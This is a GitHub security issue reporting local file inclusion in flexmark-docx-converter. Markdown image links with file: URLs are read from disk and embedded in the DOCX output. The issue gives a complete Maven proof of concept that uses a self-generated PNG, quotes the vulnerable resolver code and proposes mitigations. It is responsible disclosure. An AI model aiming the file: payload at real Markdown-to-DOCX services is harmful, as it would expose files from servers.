Local file inclusion via file: image references in DOCX rendering #678

@Str1ckl4nd

Describe the bug

flexmark-docx-converter resolves Markdown image URLs and embeds the referenced image content into the generated DOCX. A file: URL supplied in attacker-controlled Markdown is treated as a valid image source and is read from the local filesystem by the default content resolver.

This means an application that converts untrusted Markdown to DOCX can be made to read a local file from the conversion environment and embed it into the generated .docx.

Affected component:

  • flexmark-docx-converter
  • DocxRenderer
  • Markdown image rendering

Affected version:

  • Tested against com.vladsch.flexmark:flexmark-docx-converter:0.64.8

To Reproduce

The following is a complete Maven reproducer. It creates a local proof PNG, references that local file from Markdown using a file: URL, renders the Markdown to DOCX, then opens the generated DOCX as a ZIP archive and verifies that the proof image was embedded under word/media/.

The PoC intentionally uses a locally generated proof image instead of reading any sensitive system file.

mkdir flexmark-docx-file-image-poc
cd flexmark-docx-file-image-poc
mkdir -p src/main/java

cat > pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>poc</groupId>
  <artifactId>flexmark-docx-file-image-poc</artifactId>
  <version>1.0-SNAPSHOT</version>

  <properties>
    <maven.compiler.source>11</maven.compiler.source>
    <maven.compiler.target>11</maven.compiler.target>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <dependency>
      <groupId>com.vladsch.flexmark</groupId>
      <artifactId>flexmark</artifactId>
      <version>0.64.8</version>
    </dependency>
    <dependency>
      <groupId>com.vladsch.flexmark</groupId>
      <artifactId>flexmark-docx-converter</artifactId>
      <version>0.64.8</version>
    </dependency>
  </dependencies>

  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>exec-maven-plugin</artifactId>
        <version>3.3.0</version>
        <configuration>
          <mainClass>Repro</mainClass>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
EOF

cat > src/main/java/Repro.java <<'EOF'
import com.vladsch.flexmark.docx.converter.DocxRenderer;
import com.vladsch.flexmark.parser.Parser;
import com.vladsch.flexmark.util.ast.Node;
import com.vladsch.flexmark.util.data.MutableDataSet;
import org.docx4j.Docx4J;
import org.docx4j.openpackaging.packages.WordprocessingMLPackage;

import javax.imageio.ImageIO;
import java.awt.Color;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

public class Repro {
    public static void main(String[] args) throws Exception {
        Files.createDirectories(Path.of("target", "local-proof"));
        Path proofImage = Path.of("target", "local-proof", "flexmark-local-proof.png").toAbsolutePath();
        writeProofImage(proofImage);

        String fileUri = toFlexmarkFileUri(proofImage);
        String markdown = "![attacker controlled local image](" + fileUri + ")\n";

        MutableDataSet options = new MutableDataSet();
        Parser parser = Parser.builder(options).build();
        DocxRenderer renderer = DocxRenderer.builder(options).build();

        Node document = parser.parse(markdown);
        WordprocessingMLPackage template = DocxRenderer.getDefaultTemplate();
        renderer.render(document, template);

        File output = Path.of("target", "flexmark-docx-file-image-poc.docx").toFile();
        template.save(output, Docx4J.FLAG_SAVE_ZIP_FILE);

        if (!docxContainsProofImage(output)) {
            throw new IllegalStateException("The generated DOCX did not contain the local proof image");
        }

        System.out.println("Markdown input:");
        System.out.println(markdown);
        System.out.println("Generated DOCX: " + output.getAbsolutePath());
        System.out.println("FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED");
    }

    private static String toFlexmarkFileUri(Path path) {
        String normalized = path.toAbsolutePath().toString().replace(File.separatorChar, '/');
        if (!normalized.startsWith("/")) {
            normalized = "/" + normalized;
        }
        return "file:" + normalized;
    }

    private static void writeProofImage(Path path) throws Exception {
        BufferedImage img = new BufferedImage(8, 8, BufferedImage.TYPE_INT_RGB);
        for (int y = 0; y < 8; y++) {
            for (int x = 0; x < 8; x++) {
                int color;
                if (x < 4 && y < 4) {
                    color = Color.RED.getRGB();
                } else if (x >= 4 && y < 4) {
                    color = Color.GREEN.getRGB();
                } else if (x < 4) {
                    color = Color.BLUE.getRGB();
                } else {
                    color = Color.YELLOW.getRGB();
                }
                img.setRGB(x, y, color);
            }
        }
        ImageIO.write(img, "png", path.toFile());
    }

    private static boolean docxContainsProofImage(File docx) throws Exception {
        try (ZipFile zip = new ZipFile(docx)) {
            return zip.stream()
                    .filter(entry -> entry.getName().startsWith("word/media/"))
                    .anyMatch(entry -> imageEntryMatches(zip, entry));
        }
    }

    private static boolean imageEntryMatches(ZipFile zip, ZipEntry entry) {
        try (InputStream input = zip.getInputStream(entry)) {
            BufferedImage img = ImageIO.read(input);
            if (img == null || img.getWidth() != 8 || img.getHeight() != 8) {
                return false;
            }
            return sameRgb(img.getRGB(1, 1), Color.RED)
                    && sameRgb(img.getRGB(6, 1), Color.GREEN)
                    && sameRgb(img.getRGB(1, 6), Color.BLUE)
                    && sameRgb(img.getRGB(6, 6), Color.YELLOW);
        } catch (Exception e) {
            return false;
        }
    }

    private static boolean sameRgb(int actual, Color expected) {
        return (actual & 0x00ffffff) == (expected.getRGB() & 0x00ffffff);
    }
}
EOF

mvn -q compile exec:java

Resulting Output

The reproducer prints the attacker-controlled Markdown input and confirms that the local proof image was embedded into the generated DOCX:

Markdown input:
![attacker controlled local image](file:/.../target/local-proof/flexmark-local-proof.png)

Generated DOCX: .../target/flexmark-docx-file-image-poc.docx
FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED

The generated DOCX contains the local proof image under word/media/. The reproducer verifies this by reading image entries from the DOCX ZIP archive and checking the expected pixel pattern.

Root cause

The default DocxLinkResolver treats image links as valid local content. With default options, if DOC_RELATIVE_URL and DOC_ROOT_URL are empty, it returns the original URL as LinkStatus.VALID:

if (docRelativeURL.isEmpty() && docRootURL.isEmpty()) {
    return link.withStatus(LinkStatus.VALID)
            .withUrl(url);
}

When root or relative URL options are configured, file:/ URLs are also explicitly accepted:

} else if (url.startsWith("file:/")) {
    return link.withStatus(LinkStatus.VALID)
            .withUrl(url);
}

The default FileUriContentResolver then reads valid file:/ URLs from the local filesystem:

if (resolvedLink.getStatus() == LinkStatus.VALID) {
    String url = resolvedLink.getUrl();
    if (url.startsWith("file:/")) {
        // substring: the filesystem path portion of url (its derivation is omitted from this excerpt)
        File includedFile = new File(substring);
        if (includedFile.isFile() && includedFile.exists()) {
            return content.withContent(FileUtil.getFileContentBytesWithExceptions(includedFile))
                    .withStatus(LinkStatus.VALID);
        }
    }
}

Finally, image rendering loads those bytes and embeds the image into the DOCX:

ResolvedContent resolvedContent = docx.resolvedContent(resolvedLink);
if (resolvedContent.getStatus() == LinkStatus.VALID) {
    image = ImageUtils.loadImageFromContent(resolvedContent.getContent(), resolvedLink.getUrl());
}
...
return newImage(docx, image, filenameHint, attributes, id1, id2, scale);

Expected behavior

file: URLs from Markdown image input should not be read and embedded by default when converting untrusted Markdown to DOCX.

Possible safe behaviors:

  • reject file: image URLs by default
  • require an explicit opt-in option for local file embedding
  • restrict local image reads to a configured safe base directory
  • reject absolute paths and path traversal outside the configured document root
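The options above could be combined into a single pre-resolution check. The following is only a minimal sketch, not flexmark code: the class `ImageUrlPolicy` and its method `isAllowed` are hypothetical names, and allowing `http`/`https` through is an assumption made for illustration. Passing a `null` base directory models "reject file: by default"; passing a directory models "opt in, restricted to a safe base directory".

```java
import java.net.URI;
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;

/** Hypothetical pre-resolution policy for image URLs; not part of flexmark. */
final class ImageUrlPolicy {
    // Assumption for this sketch: remote images over http(s) remain allowed.
    private static final Set<String> REMOTE_SCHEMES = Set.of("http", "https");

    private ImageUrlPolicy() {}

    /**
     * Returns true if the image URL may be resolved.
     * A null baseDir means local files are never allowed (the default-deny case).
     */
    static boolean isAllowed(String url, Path baseDir) {
        if (url == null) {
            return false;
        }
        URI uri;
        try {
            uri = URI.create(url.trim());
        } catch (IllegalArgumentException e) {
            return false; // unparseable URLs are rejected
        }
        String scheme = uri.getScheme();
        if (scheme == null) {
            return false; // relative references are rejected in this sketch
        }
        scheme = scheme.toLowerCase(Locale.ROOT);
        if (REMOTE_SCHEMES.contains(scheme)) {
            return true;
        }
        if (!scheme.equals("file") || baseDir == null) {
            return false; // unknown scheme, or local reads not opted in
        }
        Path target;
        try {
            // Throws for opaque URIs (file:relative) and for URIs with a host.
            target = Path.of(uri).toAbsolutePath().normalize();
        } catch (RuntimeException e) {
            return false;
        }
        Path root = baseDir.toAbsolutePath().normalize();
        // Path.startsWith compares whole path components, so a sibling such as
        // /srv/docs-evil does not match the root /srv/docs.
        return target.startsWith(root);
    }
}
```

`normalize()` only removes `.` and `..` segments lexically. A production check would likely also resolve symbolic links (for example with `Path.toRealPath()`) before comparing against the base directory.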

Impact

If a server-side or automated workflow converts attacker-controlled Markdown to DOCX, an attacker can cause the conversion process to read local image files and embed them into the resulting document.

The PoC uses a generated PNG for safety, but the same code path will read any local file that the conversion process can access and that ImageIO can decode as an image. Such files can then be disclosed from the conversion environment through the generated .docx.
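To make the "ImageIO accepts as an image" boundary concrete, the sketch below probes files with `ImageIO.read`, which returns `null` when no registered reader can decode the input. It assumes, as this report describes, that the renderer's image loading is backed by ImageIO; the class `ImageDecodeProbe` and its method `decodesAsImage` are hypothetical names used only for this illustration.

```java
import javax.imageio.ImageIO;
import java.awt.image.BufferedImage;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

/** Hypothetical probe illustrating which files ImageIO can decode. */
final class ImageDecodeProbe {
    private ImageDecodeProbe() {}

    /** Returns true if ImageIO can decode the file as an image. */
    static boolean decodesAsImage(Path file) throws IOException {
        // ImageIO.read returns null when no registered ImageReader accepts the input.
        return ImageIO.read(file.toFile()) != null;
    }

    public static void main(String[] args) throws IOException {
        // A plain text file: readable by the process, but not an image.
        Path text = Files.createTempFile("probe", ".txt");
        Files.writeString(text, "not an image\n");

        // A tiny generated PNG, similar in spirit to the PoC's proof image.
        Path png = Files.createTempFile("probe", ".png");
        ImageIO.write(new BufferedImage(2, 2, BufferedImage.TYPE_INT_RGB), "png", png.toFile());

        System.out.println("text file decodes as image: " + decodesAsImage(text));
        System.out.println("png file decodes as image:  " + decodesAsImage(png));
    }
}
```

Under that assumption, exposure is limited to files in formats the JDK's ImageIO readers understand (such as PNG, JPEG, GIF, and BMP), for example screenshots, scans, or diagrams stored on the conversion host.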

Related issue

This is separate from #676. That issue concerns XXE in XML parsing helpers; this issue concerns Markdown image URL resolution and local file reads during DOCX image rendering.
